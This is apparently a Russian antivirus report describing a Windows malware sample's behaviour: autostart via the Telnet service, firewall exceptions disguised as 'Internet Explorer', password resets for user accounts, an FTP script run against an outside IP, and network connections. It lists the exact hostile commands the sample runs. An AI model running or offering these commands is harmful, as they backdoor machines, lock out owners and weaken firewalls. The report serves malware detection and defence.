Техническая информация
Для обеспечения автозапуска и распространения:
Создает следующие сервисы:
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
Вредоносные функции:
Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра:
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\tlntsvr.exe' = '<SYSTEM32>\tlntsvr.exe:*:Enabled:Internet Explorer'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\ftp.exe' = '<SYSTEM32>\ftp.exe:*:Enabled:FTP'
Запускает на исполнение:
- '<SYSTEM32>\tlntsvr.exe'
- '<SYSTEM32>\net1.exe' start Telnet
- '<SYSTEM32>\ftp.exe' -s:C:\MSC.sys 89.101.14.14
- '<SYSTEM32>\regsvr32.exe' /s <SYSTEM32>\tlntsvrp.dll
- '<SYSTEM32>\net1.exe' user %USERNAME% Hakker42685213
- '<SYSTEM32>\sc.exe' config TlntSvr start= auto
- '<SYSTEM32>\netsh.exe' firewall add allowedprogram program = <SYSTEM32>\tlntsvr.exe name = "Internet Explorer" mode = Enable
- '<SYSTEM32>\net1.exe' user Администратор Hakker42685213
- '<SYSTEM32>\netsh.exe' firewall add allowedprogram program = <SYSTEM32>\ftp.exe name = FTP mode = Enable
Изменения в файловой системе:
Создает следующие файлы:
- C:\MSC.sys
- C:\<Имя вируса>-PM.txt
Удаляет следующие файлы:
- C:\MSC.sys
- C:\<Имя вируса>-PM.txt
Сетевая активность:
Подключается к:
- 'localhost':1040
- 'localhost':1039
- '89.##1.14.14':21
Другое:
Ищет следующие окна:
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
